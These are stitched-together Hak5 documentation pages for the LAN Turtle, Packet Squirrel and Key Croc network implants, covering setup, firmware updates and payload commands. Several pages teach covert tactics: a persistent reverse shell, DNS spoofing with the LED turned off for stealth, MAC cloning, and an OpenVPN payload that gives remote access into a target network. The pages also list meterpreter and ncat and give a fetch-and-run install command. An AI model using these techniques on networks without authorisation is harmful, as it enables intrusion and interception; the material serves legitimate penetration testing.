Taking this a step further, I highly encourage setting up a persistent reverse shell over SSH since the AutoSSH module is much more robust than netcat and has built-in keepalive features. The process is very similar – it just requires configuring public / private key-pairs from the keymanager module first.
* * *
[_navigate\_before_ Installing Modules](https://docs.hak5.org/lan-turtle/setup-guides/installing-modules/)
[Power Considerations _navigate\_next_](https://docs.hak5.org/lan-turtle/faq-troubleshooting/power-considerations/)
---
# LAN Turtle Basics | Hak5 - LAN Turtle
[](https://docs.hak5.org/lan-turtle/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
LAN Turtle Basics
=================
The LAN Turtle is managed through the Turtle Shell – a text based, menu-driven graphical user interface accessible by SSH. The menus may be navigated using standard arrow, tab, escape and return keys as well as mouse in most terminals.
The Turtle Shell Configuration Menu provides the ability to change advanced settings such as Password, MAC address, IP address. Firmware updates may be checked for and installed as they become available.
By default the Turtle Shell will start at login via SSH unless disabled from the Configuration Menu.
Exiting the Turtle Shell returns the user to the LAN Turtle’s bash shell. To return to the Turtle Shell, run the “turtle” command.
* * *
[_navigate\_before_ LAN Turtle by Hak5](https://docs.hak5.org/lan-turtle/lan-turtle-by-hak5/)
[The Module System _navigate\_next_](https://docs.hak5.org/lan-turtle/getting-started/the-module-system/)
---
# Spoofing Dns | Hak5 - Packet Squirrel
[](https://docs.hak5.org/packet-squirrel/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Spoofing Dns
============
The built-in DNS spoofing payload from switch position 2 will intercept DNS requests between the target and the LAN and provide spoofed responses. By default the payload is configured to spoof all requests with the IP address of the Packet Squirrel.
To configure the DNS Spoof payload with custom mapping, just power on the Packet Squirrel in Arming Mode (switch to far right position) and edit the `/root/payloads/switch2/spoofhost` file. This can be achieved by either using an SCP graphical utility such as WinSCP or FileZilla, or from the command line via SSH.

SSH into the Packet Squirrel and edit the `spoofhost` file with nano
Replace `#` with the domain you wish to spoof, and the IP address with the spoofed destination.

Responds to request for asitewewanttospoof.com to 159.203.210.247
With the `spoofhost` file configured and saved, power off the Packet Squirrel and flip the switch to position 2. Now place the Packet Squirrel inline between a target and the network. When it powers on the DNS spoof payload will run, indicated by a single blinking yellow LED.
**Pro Tip**: Modify the DNS Spoof payload to be more inconspicuous and to not blink the LED by changing line 22 of `/root/payloads/switch2/payload.sh` from `LED ATTACK` to `LED OFF`
* * *
[_navigate\_before_ Logging Network Traffic](https://docs.hak5.org/packet-squirrel/default-payloads/logging-network-traffic/)
[Openvpn Payload _navigate\_next_](https://docs.hak5.org/packet-squirrel/default-payloads/openvpn-payload/)
---
# Specifications | Hak5 - LAN Turtle
[](https://docs.hak5.org/lan-turtle/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Specifications
==============
* Atheros AR9331 SoC at 400 MHz MIPS
* 16 MB Onboard Flash
* 64 MB DDR2 RAM
* 10/100 Ethernet Port
* USB Ethernet Port – Realtek RTL8152
* Indicator LED (Green Power, Amber Status)
* Button (inside case for Factory Reset / Firmware Recovery)
* Dimensions: 95 x 23 x 31 mm
* * *
[_navigate\_before_ Power Considerations](https://docs.hak5.org/lan-turtle/faq-troubleshooting/power-considerations/)
[Factory Reset _navigate\_next_](https://docs.hak5.org/lan-turtle/faq-troubleshooting/factory-reset/)
---
# Packet Squirrel Basics | Hak5 - Packet Squirrel
[](https://docs.hak5.org/packet-squirrel/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Packet Squirrel Basics
======================
Packets go in. Packets go out. What happens in between is up to you.
Of the three built-in payloads (tcpdump, dns spoof, openVPN) only the later two need to be configured. This can be done via SSH or SCP (Windows users check out puTTY and winSCP).
To get into the device flip the switch to arming mode (far right position), plug an Ethernet cable from your computer into the Ethernet In port (left side, above the micro USB port), and power on the Packet Squirrel with any ordinary Micro USB cable and USB power supply (phone charger, computer’s USB port, battery bank). It takes 30-40 seconds to boot, indicated by a blinking green LED. Once it’s booted it’ll be in arming mode, indicated by a blinking blue LED.
From here your computer will receive an IP address from the Packet Squirrel in the 172.16.32.x range, and you’ll be able to ssh in as root to `172.16.32.1`. The default password is `hak5squirrel`
You’ll find the default payloads from /root/payloads in their corresponding switch folders.

### RGB LED Indicator [_link_](https://docs.hak5.org/packet-squirrel/getting-started/packet-squirrel-basics/#rgb-led-indicator)
This status LED will light to indicate various states such as boot-up, errors and payload execution.
### Push Button [_link_](https://docs.hak5.org/packet-squirrel/getting-started/packet-squirrel-basics/#push-button)
The push button may be used by various payloads to perform functions using the `BUTTON` command. The push button has two default actions.
### Arming Mode [_link_](https://docs.hak5.org/packet-squirrel/getting-started/packet-squirrel-basics/#arming-mode)
In Switch Position 4 (closest to the USB host port) the Packet Squirrel will boot into arming mode, enabling SSH access. From this dedicated mode, Packet Squirrel payloads may be managed via SCP or the Linux shell. This mode is indicated by a slow blinking blue LED.
* * *
[_navigate\_before_ Packet Squirrel Mark by Hak5](https://docs.hak5.org/packet-squirrel/packet-squirrel-mark-by-hak5/)
[Usb Flash Disk Support _navigate\_next_](https://docs.hak5.org/packet-squirrel/getting-started/usb-flash-disk-support/)
---
# Openvpn Payload | Hak5 - Packet Squirrel
[](https://docs.hak5.org/packet-squirrel/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Openvpn Payload
===============
The OpenVPN payload for the Packet Squirrel can provide remote access or client tunneling.
**Remote Access** [_link_](https://docs.hak5.org/packet-squirrel/default-payloads/openvpn-payload/#remote-access)
------------------------------------------------------------------------------------------------------------------

The first, default behavior, is to provide remote access into the network. In this mode the target plugged into the “Ethernet In” port on the Packet Squirrel will have access to the network plugged into the “Ethernet Out” port without interruption. Meanwhile, an OpenVPN connection will be established – typically to your server on the Internet – enabling remote access into the Packet Squirrel.
**Client Tunneling** [_link_](https://docs.hak5.org/packet-squirrel/default-payloads/openvpn-payload/#client-tunneling)
------------------------------------------------------------------------------------------------------------------------

The second, optional behavior, is to tunnel all of the traffic from the target device plugged into the “Ethernet In” port through the configured OpenVPN connection. This is configured by editing the `/root/payloads/switch3/payload.sh` file and changing line 5 to `FOR_CLIENTS=1`
In either mode the SSH server on the Packet Squirrel will be enabled for remote access.
SERVER SETUP [_link_](https://docs.hak5.org/packet-squirrel/default-payloads/openvpn-payload/#server-setup)
------------------------------------------------------------------------------------------------------------
Begin by setting up an OpenVPN server, typically on a VPS or dedicated server with a static IP address. For reference, see the Hak5 youtube playlist titled “[Hak5: VPNs – Everything You Need to Know](https://www.youtube.com/playlist?list=PLW5y1tjAOzI3YEamgvUlLvtiiQwMsTj3H)
” or search for Hak5 episode 2022 for a 5-minute OpenVPN install script.
info
Try the OpenVPN installer from [https://github.com/Nyr/openvpn-install](https://github.com/Nyr/openvpn-install)
From a shell on your new VPS or dedicated server on the Internet, issue:
`wget https://git.io/vpn -O openvpn.sh && bash openvpn.sh`
Accept all of the defaults and in a few moments a client.ovpn file will be created.
CLIENT SETUP [_link_](https://docs.hak5.org/packet-squirrel/default-payloads/openvpn-payload/#client-setup)
------------------------------------------------------------------------------------------------------------
With the server setup, generate a new client certificate file and copy it to the Packet Squirrel in `/root/payloads/switch3/config.ovpn`
**Quick Setup**: SSH into the Packet Squirrel in Arming Mode and have it copy the `client.ovpn` file from your OpenVPN server to the OpenVPN payloads `config.ovpn` file using SCP (Secure Copy)
`scp user@server:client.ovpn /root/payloads/switch3/config.ovpn`
DEPLOYMENT [_link_](https://docs.hak5.org/packet-squirrel/default-payloads/openvpn-payload/#deployment)
--------------------------------------------------------------------------------------------------------
With the OpenVPN server ready and the client on the Packet Squirrel configured, flip the selector switch to position 3 and deploy inline between a target and network in the same manner as the previous Packet Capture and DNS Spoof examples. When the OpenVPN connection is established the Packet Squirrel will blink yellow.
If you’re using the Client Tunneling mode there’s no further configuration necessary. To test the connection, for example if the target is a computer, try browsing to one of the many IP address testing sites like ipchicken.com to verify that the connection is being tunneled through the VPN.
If you’re using the Remote Access mode, the Internet connection of the target will not go through the VPN. Rather, the VPN may be used to SSH into the Packet Squirrel. To do so, begin by connecting to the VPN server via SSH and determine the IP address of the Packet Squirrel on its OpenVPN network. Typically this is the incremented one following the IP address of the OpenVPN servers tunnel interface. For example, on the OpenVPN server issue ifconfig and look for a tun0 interface. The default address is `10.8.0.1`. From there, SSH into the Packet Squirrel as root at `10.8.0.2`.\\

* * *
[_navigate\_before_ Spoofing Dns](https://docs.hak5.org/packet-squirrel/default-payloads/spoofing-dns/)
[Getting The Packet Squirrel Online _navigate\_next_](https://docs.hak5.org/packet-squirrel/internet-connectivity/getting-the-packet-squirrel-online/)
---
# Factory Reset | Hak5 - LAN Turtle
[](https://docs.hak5.org/lan-turtle/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Factory Reset
=============
In the extreme case that a LAN Turtle has become permanently inaccessible or inoperative, there is a quick method for recovery using a dedicated recovery web interface.
1. Download the latest LAN Turtle recovery image from the [Hak5 Download Portal.](https://downloads.hak5.org/turtle)
report
Note that the factory recovery firmware differs from the regular firmware image and must be used for this process. Do not attempt firmware recovery using the normal LAN Turtle firmware.

Silver Button
}}

Gold Button
}}

Jumper Pads
}}
4. While holding the reset button, switch or jumper on the bottom of the LAN Turtle, plug the device into a computer and **continue holding for the first 5 seconds during boot**, **then release**. \\
5. Wait an additional 30-180 seconds to receive an IP address from the LAN Turtle.\\

Jumper pads for reset
}}
info
If you do not receive an IP address in the 192.168.x range from the LAN Turtle within a minute, statically assign the LAN Turtle’s interface to 192.168.1.2 (netmask 255.255.255.0)

Statically asigning IP in Kali
}}
6. Browse to the LAN Turtle firmware recovery web interface at [http://192.168.1.1](http://192.168.1.1/)
and follow the on screen prompts to upload and flash the factory image downloaded in step 1.

LAN Turtle Recovery page
}}
7. **Wait 5-10 minutes** until flashing completes as indicated by a special LED blink pattern seen in the video above.
When the flash is complete the LAN Turtle will reboot and will be accessible again from 172.16.84.1 with the default username root and password **sh3llz**
* * *
[_navigate\_before_ Specifications](https://docs.hak5.org/lan-turtle/faq-troubleshooting/specifications/)
[Manual Upgrade _navigate\_next_](https://docs.hak5.org/lan-turtle/faq-troubleshooting/manual-upgrade/)
---
# Manual Upgrade | Hak5 - LAN Turtle
[](https://docs.hak5.org/lan-turtle/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Manual Upgrade
==============
LAN Turtle firmware may be updated”over the air” by choosing Check for Updates from the Config menu. If an Internet providing Ethernet connection is not available, updates may be flashed to the device manually using the following process:
1. Download the latest UPDATE file from the [download center](https://downloads.hak5.org/)
and verify its checksum.
2. Verify that the SHA256 checksums match
3. Manually SCP the file to the LAN Turtle in /tmp (ex: `scp turtle-5.bin root@172.16.84.1:/tmp/`)
4. From the LAN Turtle, exit shell to the bash prompt and issue: `sysupgrade -n /tmp/turtle-3.bin`
5. Wait about 5 minutes for the LAN Turtle to flash the firmware and reboot itself
* * *
[_navigate\_before_ Factory Reset](https://docs.hak5.org/lan-turtle/faq-troubleshooting/factory-reset/)
[First Boot And Software Update _navigate\_next_](https://docs.hak5.org/lan-turtle/video-guides/first-boot-and-software-update/)
---
# Man In The Middle With Dns Spoof | Hak5 - LAN Turtle
[](https://docs.hak5.org/lan-turtle/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Man In The Middle With Dns Spoof
================================
* * *
[_navigate\_before_ First Boot And Software Update](https://docs.hak5.org/lan-turtle/video-guides/first-boot-and-software-update/)
[Man In The Middle With Url Snarf _navigate\_next_](https://docs.hak5.org/lan-turtle/video-guides/man-in-the-middle-with-url-snarf/)
---
# Man In The Middle With Url Snarf | Hak5 - LAN Turtle
[](https://docs.hak5.org/lan-turtle/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Man In The Middle With Url Snarf
================================
* * *
[_navigate\_before_ Man In The Middle With Dns Spoof](https://docs.hak5.org/lan-turtle/video-guides/man-in-the-middle-with-dns-spoof/)
[Metasploit And Lan Turtle With Meterpreter _navigate\_next_](https://docs.hak5.org/lan-turtle/video-guides/metasploit-and-lan-turtle-with-meterpreter/)
---
# Metasploit And Lan Turtle With Meterpreter | Hak5 - LAN Turtle
[](https://docs.hak5.org/lan-turtle/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Metasploit And Lan Turtle With Meterpreter
==========================================
* * *
[_navigate\_before_ Man In The Middle With Url Snarf](https://docs.hak5.org/lan-turtle/video-guides/man-in-the-middle-with-url-snarf/)
[Obtaining Credentials From A Locked Pc _navigate\_next_](https://docs.hak5.org/lan-turtle/video-guides/obtaining-credentials-from-a-locked-pc/)
---
# Obtaining Credentials From A Locked Pc | Hak5 - LAN Turtle
[](https://docs.hak5.org/lan-turtle/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Obtaining Credentials From A Locked Pc
======================================
* * *
[_navigate\_before_ Metasploit And Lan Turtle With Meterpreter](https://docs.hak5.org/lan-turtle/video-guides/metasploit-and-lan-turtle-with-meterpreter/)
[Persistent Shell Access With Autossh _navigate\_next_](https://docs.hak5.org/lan-turtle/video-guides/persistent-shell-access-with-autossh/)
---
# Ducky Script For Packet Squirrel | Hak5 - Packet Squirrel
[](https://docs.hak5.org/packet-squirrel/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Ducky Script For Packet Squirrel
================================
Ducky Script is the payload language of Hak5 gear. It consisting of a number of simple commands specific to the Packet Squirrel hardware and the full power of Bash. Theses payloads, named `payload.txt`, execute on boot by the Packet Squirrel depending on switch position.
Basic Ducky Script command for the Packet Squirrel include:
| COMMAND | Description |
| --- | --- |
| `NETMODE` | Specifies the networking mode to `NAT`, `BRIDGE`, `TRANSPARENT` or `VPN`. |
| `LED` | Control the RGB LED. Accepts color and pattern or payload state. |
| `BUTTON` | Pauses the payload for a specified time or until the button is pressed. |
| `SWITCH` | Reports the current switch position. |
* * *
[_navigate\_before_ Payload Development Basics](https://docs.hak5.org/packet-squirrel/payload-development/payload-development-basics/)
[The NETMODE Command _navigate\_next_](https://docs.hak5.org/packet-squirrel/payload-development/the-netmode-command/)
---
# Persistent Shell Access With Autossh | Hak5 - LAN Turtle
[](https://docs.hak5.org/lan-turtle/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Persistent Shell Access With Autossh
====================================
* * *
[_navigate\_before_ Obtaining Credentials From A Locked Pc](https://docs.hak5.org/lan-turtle/video-guides/obtaining-credentials-from-a-locked-pc/)
[Remote File Systems With Sshfs _navigate\_next_](https://docs.hak5.org/lan-turtle/video-guides/remote-file-systems-with-sshfs/)
---
# Serial Console Access | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Serial Console Access
=====================
The Key Croc features a dedicated serial console from its arming mode. From serial, its Linux shell may be accessed.
#### SERIAL CONSOLE SETTINGS [_link_](https://docs.hak5.org/key-croc/basics/serial-console-access/#serial-console-settings)
* 115200/8N1
* Baud: 115200
* Data Bits: 8
* Parity Bit: No
* Stop Bit: 1
#### CONNECTING TO THE SERIAL CONSOLE FROM WINDOWS [_link_](https://docs.hak5.org/key-croc/basics/serial-console-access/#connecting-to-the-serial-console-from-windows)
Find the COM# from Device Manager > Ports (COM & LPT) and look for USB Serial Device (COM#). Example: COM3
Alternatively, run the following powershell command to list ports:
`[System.IO.Ports.SerialPort]::getportnames()`
Open PuTTY and select Serial. Enter COM# for serial line and 115200 for Speed. Click Open.
Download PuTTY from [http://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html](http://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html)
#### CONNECTING TO THE SERIAL CONSOLE FROM LINUX [_link_](https://docs.hak5.org/key-croc/basics/serial-console-access/#connecting-to-the-serial-console-from-linux)
Find the Key Croc device from the terminal
`ls /dev/tty*" or "dmesg | grep tty`
Usually on a Linux host, the Key Croc will register as either `/dev/ttyUSB0` or `/dev/ttyACM0`. On an OSX/macOS host, the Key Croc may register as `/dev/tty.usbmodemch000001`.
Next, connect to the serial device using screen, minicom or your terminal emulator of choice.
If the screen application is not installed it can usually be found from your distribution package manager.
`sudo apt install screen`
Connecting with screen
`sudo screen /dev/ttyACM0 115200`
Disconnect with keyboard combo: `CTRL+a` followed by `CTRL+\`
#### CONNECTING TO THE SERIAL CONSOLE FROM MAC [_link_](https://docs.hak5.org/key-croc/basics/serial-console-access/#connecting-to-the-serial-console-from-mac)
MacOS users may follow the same recommendations for connecting to the Key Croc serial console as Linux users.
Many MacOS specific applications exist for connecting to and managing serial connections however, with Serial 2 by Decisive Tactics being a favorite. See [https://www.decisivetactics.com/products/serial/](https://www.decisivetactics.com/products/serial/)
* * *
[_navigate\_before_ Key Croc Basics](https://docs.hak5.org/key-croc/basics/key-croc-basics/)
[Updating The Firmware _navigate\_next_](https://docs.hak5.org/key-croc/basics/updating-the-firmware/)
---
# The NETMODE Command | Hak5 - Packet Squirrel
[](https://docs.hak5.org/packet-squirrel/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
The NETMODE Command
===================
`NETMODE` is a Ducky Script command for the Packet Squirrel which specifies which network mode to use in a given payload. These network modes determine how the Packet Squirrel will route traffic.
**NETMODE BRIDGE** [_link_](https://docs.hak5.org/packet-squirrel/payload-development/the-netmode-command/#netmode-bridge)
---------------------------------------------------------------------------------------------------------------------------
This creates a bridge between the two Ethernet interfaces. This means that both the Packet Squirrel and it’s target device get IP addresses from the target network’s router.
**NETMODE TRANSPARENT** [_link_](https://docs.hak5.org/packet-squirrel/payload-development/the-netmode-command/#netmode-transparent)
-------------------------------------------------------------------------------------------------------------------------------------
This mode is similar to the bridge network mode with the exception that the Packet Squirrel does not get an IP address from the target network’s router. This means that the Packet Squirrel will not have network (typically Internet) access, however it will be able to sniff the packets across the wire.
**NETMODE NAT** [_link_](https://docs.hak5.org/packet-squirrel/payload-development/the-netmode-command/#netmode-nat)
---------------------------------------------------------------------------------------------------------------------
In this network mode the Packet Squirrel obtains an IP address from the target network’s router and the target device gets an IP address from the Packet Squirrel.
**NETMODE VPN** [_link_](https://docs.hak5.org/packet-squirrel/payload-development/the-netmode-command/#netmode-vpn)
---------------------------------------------------------------------------------------------------------------------
This network mode is the same as NAT with special VPN interface setup specific for client tunneling.
**NETMODE CLONE** [_link_](https://docs.hak5.org/packet-squirrel/payload-development/the-netmode-command/#netmode-clone)
-------------------------------------------------------------------------------------------------------------------------
This network mode clones the MAC address of the target device from the Ethernet In port, spoofing it for use on the LAN from the Packet Squirrel’s Ethernet Out ports.
In practice, when deploying a Packet Squirrel payload with `NETMODE CLONE`, the MAC address is sniffed from the target (IN) and will change the MAC address on the LAN (OUT) side. This is done by inspecting sniffed packets from the target device and is typically done in just a few seconds.
For stealth deployments, have the Packet Squirrel clone the MAC address of the target device from its Ethernet IN port _before_ connecting the cable to the Ethernet OUT port. The Packet Squirrel will indicate that the MAC address has been successfully cloned by several seconds of rapid white blinking on its LED.
* * *
[_navigate\_before_ Ducky Script For Packet Squirrel](https://docs.hak5.org/packet-squirrel/payload-development/ducky-script-for-packet-squirrel/)
[The LED Command _navigate\_next_](https://docs.hak5.org/packet-squirrel/payload-development/the-led-command/)
---
# The LED Command | Hak5 - Packet Squirrel
[](https://docs.hak5.org/packet-squirrel/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
The LED Command
===============
The multi-color RGB LED status indicator on the Packet Squirrel may be set using the `LED` command. It accepts either a combination of color and pattern, or a common payload state.
### LED COLORS [_link_](https://docs.hak5.org/packet-squirrel/payload-development/the-led-command/#led-colors)
| COMMAND | Description |
| --- | --- |
| R | Red |
| G | Green |
| B | Blue |
| Y | Yellow (AKA Amber) |
| C | Cyan (AKA Light Blue) |
| M | Magenta (AKA Violet or Purple) |
| W | White |
#### LED PATTERNS [_link_](https://docs.hak5.org/packet-squirrel/payload-development/the-led-command/#led-patterns)
| PATTERN | Description |
| --- | --- |
| SOLID | _Default_ No blink. Used if pattern argument is omitted |
| SLOW | Symmetric 1000ms ON, 1000ms OFF, repeating |
| FAST | Symmetric 100ms ON, 100ms OFF, repeating |
| VERYFAST | Symmetric 10ms ON, 10ms OFF, repeating |
| SINGLE | 1 100ms blink(s) ON followed by 1 second OFF, repeating |
| DOUBLE | 2 100ms blink(s) ON followed by 1 second OFF, repeating |
| TRIPLE | 3 100ms blink(s) ON followed by 1 second OFF, repeating |
| QUAD | 4 100ms blink(s) ON followed by 1 second OFF, repeating |
| QUIN | 5 100ms blink(s) ON followed by 1 second OFF, repeating |
| ISINGLE | 1 100ms blink(s) OFF followed by 1 second ON, repeating |
| IDOUBLE | 2 100ms blink(s) OFF followed by 1 second ON, repeating |
| ITRIPLE | 3 100ms blink(s) OFF followed by 1 second ON, repeating |
| IQUAD | 4 100ms blink(s) OFF followed by 1 second ON, repeating |
| IQUIN | 5 100ms blink(s) OFF followed by 1 second ON, repeating |
| SUCCESS | 1000ms VERYFAST blink followed by SOLID |
| 1-10000 | Custom value in ms for continuous symmetric blinking |
### LED STATE [_link_](https://docs.hak5.org/packet-squirrel/payload-development/the-led-command/#led-state)
These standardized LED States may be used to indicate common payload status. The basic LED states include `SETUP`, `FAIL`, `ATTACK`, `CLEANUP` and `FINISH`. Payload developers are encouraged to use these common payload states. Additional states including multi-staged attack patterns are shown in the table below.
| STATE | COLOR PATTERN | Description |
| --- | --- | --- |
| SETUP | M SOLID | Magenta solid |
| FAIL | R SLOW | Red slow blink |
| FAIL1 | R SLOW | Red slow blink |
| FAIL2 | R FAST | Red fast blink |
| FAIL3 | R VERYFAST | Red very fast blink |
| ATTACK | Y SINGLE | Yellow single blink |
| STAGE1 | Y SINGLE | Yellow single blink |
| STAGE2 | Y DOUBLE | Yellow double blink |
| STAGE3 | Y TRIPLE | Yellow triple blink |
| STAGE4 | Y QUAD | Yellow quadruple blink |
| STAGE5 | Y QUIN | Yellow quintuple blink |
| SPECIAL | C ISINGLE | Cyan inverted single blink |
| SPECIAL1 | C ISINGLE | Cyan inverted single blink |
| SPECIAL2 | C IDOUBLE | Cyan inverted double blink |
| SPECIAL3 | C ITRIPLE | Cyan inverted triple blink |
| SPECIAL4 | C IQUAD | Cyan inverted quadriple blink |
| SPECIAL5 | C IQUIN | Cyan inverted quintuple blink |
| CLEANUP | W FAST | White fast blink |
| FINISH | G SUCCESS | Green 1000ms VERYFAST blink followed by SOLID |
### EXAMPLES [_link_](https://docs.hak5.org/packet-squirrel/payload-development/the-led-command/#examples)
`LED Y SINGLE`
`LED M 500`
`LED SETUP`
* * *
[_navigate\_before_ The NETMODE Command](https://docs.hak5.org/packet-squirrel/payload-development/the-netmode-command/)
[The SWITCH Command _navigate\_next_](https://docs.hak5.org/packet-squirrel/payload-development/the-switch-command/)
---
# Remote File Systems With Sshfs | Hak5 - LAN Turtle
[](https://docs.hak5.org/lan-turtle/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Remote File Systems With Sshfs
==============================
* * *
[_navigate\_before_ Persistent Shell Access With Autossh](https://docs.hak5.org/lan-turtle/video-guides/persistent-shell-access-with-autossh/)
[The Turtle Shell And Turtle Modules _navigate\_next_](https://docs.hak5.org/lan-turtle/video-guides/the-turtle-shell-and-turtle-modules/)
---
# The Turtle Shell And Turtle Modules | Hak5 - LAN Turtle
[](https://docs.hak5.org/lan-turtle/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
The Turtle Shell And Turtle Modules
===================================
* * *
[_navigate\_before_ Remote File Systems With Sshfs](https://docs.hak5.org/lan-turtle/video-guides/remote-file-systems-with-sshfs/)
---
# Connecting For The First Time | Hak5 - LAN Turtle
[](https://docs.hak5.org/lan-turtle/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Connecting For The First Time
=============================
When configuring the LAN Turtle for the first time, a direct connection to the operator’s notebook or desktop computer is recommended. The USB plug will both power the LAN Turtle (as indicated by the Green LED) as well as expose a USB Ethernet adapter to the computer for management.
Once connected to the operator’s computer via USB, the LAN Turtle will boot. The boot sequence completes in about 30 seconds, during which the the Amber LED will blink. The first time the LAN Turtle is plugged in, the Amber LED will continue blinking until initial configuration is completed via SSH.
Once bootup is complete, the LAN Turtle’s network interface on the USB facing side will offer the host computer an IP address via DHCP.
Ensure the host computer is configured to accept IP from DHCP, or alternatively specify a static address in the LAN Turtle’s IP range.
Once the LAN Turtle has completely booted and the host computer has been assigned an IP address, the operator may access the LAN Turtle’s Shell via SSH.
* * *
[_navigate\_before_ SSH Clients](https://docs.hak5.org/lan-turtle/getting-started/ssh-clients/)
[Setting Up A New Lan Turtle _navigate\_next_](https://docs.hak5.org/lan-turtle/setup-guides/setting-up-a-new-lan-turtle/)
---
# The SWITCH Command | Hak5 - Packet Squirrel
[](https://docs.hak5.org/packet-squirrel/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
The SWITCH Command
==================
`SWITCH` is a Ducky Script command for the Packet Squirrel which will report back the current position of the hardware payload selection switch. It may be used by advanced payloads as a toggle where user input is required.
The command will output either “`switch1`”, “`switch2`”, “`switch3`” or “`switch4`”
* * *
[_navigate\_before_ The LED Command](https://docs.hak5.org/packet-squirrel/payload-development/the-led-command/)
[The Button Command _navigate\_next_](https://docs.hak5.org/packet-squirrel/payload-development/the-button-command/)
---
# The Button Command | Hak5 - Packet Squirrel
[](https://docs.hak5.org/packet-squirrel/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
The Button Command
==================
`BUTTON` is a Ducky Script command for the Packet Squirrel which pauses the payload until either the hardware push-button has been momentarily depressed, or an optionally specified time has elapsed.
In the event that a time is specified, `BUTTON` will exit with a non zero return code if the push-button is not pressed in the given time, and zero if the push-button was pressed.
`BUTTON 1m && { echo "button pressed" } || { echo "button not pressed" }`
If no time is specified the `BUTTON` command will pause indefinitely until the push-button is pressed.
During this pause, the `LED` will light the `SPECIAL` status, meaning a solid cyan color which blinks off for 100 ms every second.
Time may be specified in (s)econds, (m)inutes, (h)ours or (d)ays. For example:
`BUTTON 10s # Wait for 10 seconds for button press BUTTON 30m # Wait for 30 minutes for button press BUTTON 365d # Wait 1 year for button press BUTTON # wait indefinitely for button press`
The special LED status light may be suppressed by setting the `NO_LED` environment variable to 1.
`NO_LED=1 BUTTON 1m`
* * *
[_navigate\_before_ The SWITCH Command](https://docs.hak5.org/packet-squirrel/payload-development/the-switch-command/)
[Included Tools _navigate\_next_](https://docs.hak5.org/packet-squirrel/payload-development/included-tools/)
---
# Updating The Firmware | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Updating The Firmware
=====================
The Key Croc ships with a basic key-logging firmware. Unlock additional features like [Cloud C2](https://c2.hak5.org/)
, advanced keystroke injection and payloads by following this guide.
### STEP 1: DOWNLOAD THE LATEST FIRMWARE [_link_](https://docs.hak5.org/key-croc/basics/updating-the-firmware/#step-1-download-the-latest-firmware)
[Download the latest Key Croc firmware](https://downloads.hak5.org/api/devices/keycroc/firmwares/latest)
from [downloads.hak5.org](https://downloads.hak5.org/)
. Do not extract the .tar.gz archive (Safari users: [disable automatic unzipping](https://discussions.apple.com/thread/3736146)
). Do not proceed until the file checksum has been verified against the SHA256 listed from the download site as a damaged file will corrupt the device.
### STEP 2: CONNECT THE KEY CROC IN ARMING MODE [_link_](https://docs.hak5.org/key-croc/basics/updating-the-firmware/#step-2-connect-the-key-croc-in-arming-mode)
Plug the Key Croc into your computer. After 30 seconds, press the arming button with a paperclip or similar. The LED will blink blue, and a KeyCroc USB flash drive will appear on your computer.
### STEP 3: COPY THE FIRMWARE TO THE KEY CROC [_link_](https://docs.hak5.org/key-croc/basics/updating-the-firmware/#step-3-copy-the-firmware-to-the-key-croc)
Copy the downloaded .tar.gz upgrade file to the root of the KeyCroc drive. When the firmware file copy is complete, **safely eject** the KeyCroc drive.
### STEP 4: UNPLUG AND REPLUG THE KEY CROC [_link_](https://docs.hak5.org/key-croc/basics/updating-the-firmware/#step-4-unplug-and-replug-the-key-croc)
Unplug and replug Key Croc. The LED will show a red/blue pattern for about 10 minutes. **DO NOT unplug the Key Croc** during this process as doing so irreparably damages the device.
When the firmware upgrade is complete the device will reboot, indicated by a green LED. Your Key Croc is now up to date. If the Key Croc does not automatically reboot, wait 5 minutes after the LED has turned off, then unplug and replug. Version may be verify form version.txt on the root of the KeyCroc flash disk.
* * *
[_navigate\_before_ Serial Console Access](https://docs.hak5.org/key-croc/basics/serial-console-access/)
[Factory Reset _navigate\_next_](https://docs.hak5.org/key-croc/basics/factory-reset/)
---
# Included Tools | Hak5 - Packet Squirrel
[](https://docs.hak5.org/packet-squirrel/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Included Tools
==============
Tools on the Packet Squirrel include:
* openvpn
* autossh
* tcpdump
* meterpreter-https
* cron
* nmap
* ncat-ssl
* ncat
